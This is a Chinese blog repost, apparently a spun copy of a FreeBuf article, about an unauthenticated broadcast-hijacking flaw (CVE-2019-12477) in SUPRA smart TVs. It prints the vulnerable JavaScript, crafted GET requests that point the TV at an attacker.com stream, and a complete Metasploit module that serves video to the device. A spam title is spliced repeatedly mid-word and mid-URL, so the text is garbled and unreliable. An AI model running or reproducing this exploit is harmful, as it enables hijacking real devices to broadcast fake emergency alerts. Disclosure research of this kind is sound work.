导航菜单
首页 » 雪哥哥 » 正文

韩币兑换人民币-挖洞经历丨看我怎么玩转SUPRA智能云电视

近期,迪拜安全研究员Dhiraj Mishra 发现,SUPRA智能云电视存在播映可绑架缝隙(CVE-2019-12477),与SUPRA电视处于同一无线网络环境中的进犯者,可向电视设备假造播映恳求,插播恣意视频内容或虚伪播送音讯。

据悉,SUPRA智能云电视在俄罗斯和东欧区域十分受欢迎,首要经过网上出售途径销往俄罗斯、我国和阿联酋等国。Dhiraj Mishra发现的缝隙问题在于电视流媒体获取功用 ‘openLiveURL’,SUPRA电视用它来获取流媒体的播映内容。Mishra发现,该功用缺少必要的认证授权和会话办理办法,进犯者能够经过向一个静态的URL发送结构恳求来触发缝隙,绕过授权验证,向播映机制中注入长途视频流文件,播映恣意视频内容。

缝隙细节

Dhiraj Mishra泄漏,他经过源码查看、使用枚举和恳求发送方法终究发现了该缝隙。缝隙接口坐落 /remote/media_control?action=setUri&uri=URI服务端,存在缝隙的功用函数为openLiveTV(url),以下为openLiveTV(url)函数源码片段:

function openLiveTV(url)

{

$.get("/remote/media_control", {m_action:'setUri',m_uri:url,m_type:'video/*'},

function (data, textStatus){

if("success"==textStatus){

alert(textStatus);

}else

{

alert(textStatus);

}

});

}

向电视设备刺进恣意视频播映的结构恳求:

GET /remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8 HTTP/1.1

Host: 192.168.1.155

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,韩币兑换人民币-挖洞经历丨看我怎么玩转SUPRA智能云电视en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

当然,也能够直接用以下方法向处于同一无线网络环境中的SUPRA智能电视建议恳求,也能完成插播作用:

http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker.满岛光com/fake_broadcast_message.m3u8 韩币兑换人民币-挖洞经历丨看我怎么玩转SUPRA智能云电视

尽管上述电视播映URL中需求的是.m3u8格局视频,但咱们可用`curl -v -X GET`指令方法来发送相似恳求。根据上述剖析,歹意进犯者能够无需任何权限约束,向SUPRA智韩币兑换人民币-挖洞经历丨看我怎么玩转SUPRA智能云电视能电视插播恣意视频,严峻的状况是,进犯者能够使用这种方法来进行虚伪信息或反抗内容的煽动性宣扬,引起社会惊惧。

尽管发现缝隙已有一段时间,但由于我真实联络不到SUPRA智能电视供货商,所以一向到现在,这个缝隙也仍是未修正状况。以下POC视频展现的是SUPRA智能电视在播映乔布斯讲演节目时,进犯者使用上述缝隙,忽然插播了假造的美国国家紧迫报警体系音讯(Emergency Alert System):

Metasploit msf exploit进犯模块

##

##

class MetasploitModule < Msf::Auxiliary

include Msf::Exploit::Remote::HttpClient

include Msf::Exploit::Remote::HttpServer

def initialize(info = {})

super(update_info(info,

'Name' => 'Supra Smart Cloud TV Remote File Inclusion',

'Deion' => %q{

This module exploits an unauthenticated remote file inclusion which

exists in Supra Smart Cloud TV. The media control for the device doesn't

have any session management or authentication. Leveraging this, an

attacker on the local network can send a crafted request to broadcast a

fake video.

},

'Author' => [

'Dhiraj Mishra', # Discovery, PoC, and module

'wvu' # Module

],

'References' => [

['CVE', '2019-12477'],

['URL', '']

],

'DisclosureDate' => '2019-06-03',

'License' => MSF_LI韩币兑换人民币-挖洞经历丨看我怎么玩转SUPRA智能云电视CENSE

))

deregister_options('URIPATH'韩币兑换人民币-挖洞经历丨看我怎么玩转SUPRA智能云电视)

end

def run

start_service('Path' => '/')

print_status("Broadcasting Epic Sax Guy to #{peer}")

res = send_request_cgi(

'method' => 'GET',

'uri' => '/remote/media_control',

'encode_params' => false,

'vars_get' => {

'action' => 'setUri',

'uri' => get_uri + 'epicsax.m3u8'

}

)

unless res && res.code == 200 && res.body.include?('OK')

print_error韩币兑换人民币-挖洞经历丨看我怎么玩转SUPRA智能云电视('No doo-doodoodoodoodoo-doo for you')

return

end

# Sleep time calibrated using successful pcap

print_good('Doo-doodoodoodoodoo-doo')

print_status('Sleeping for 10s serving .m3u8 and .ts files...')

sleep(10)

end

def on_request_uri(cli, request)

dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-12477')

files = {

'/epicsax.m3u8' => 'application/x-mpegURL',

'/epicsax0.ts' => 'video/MP2T',

'/epicsax1.ts' => 'video/MP2T',

'/epicsax2.ts' => 'video/MP2T',

'/epicsax3.ts' => 'video/MP2T',

'/epicsax4.ts' => 'video/MP2T'

}

file = request.uri

unless files.include?(file)

vprint_error("Sending 404 for #{file}")

return send_not_found(cli)

end

data = File.read(File.join(dir, file))

vprint_good("Sending #{file}")

send_response(cli, data, 'Content-Type' => files[file])

end

end

*参阅来历:inputzero,clouds编译,转载请注明来自FreeBuf.COM

二维码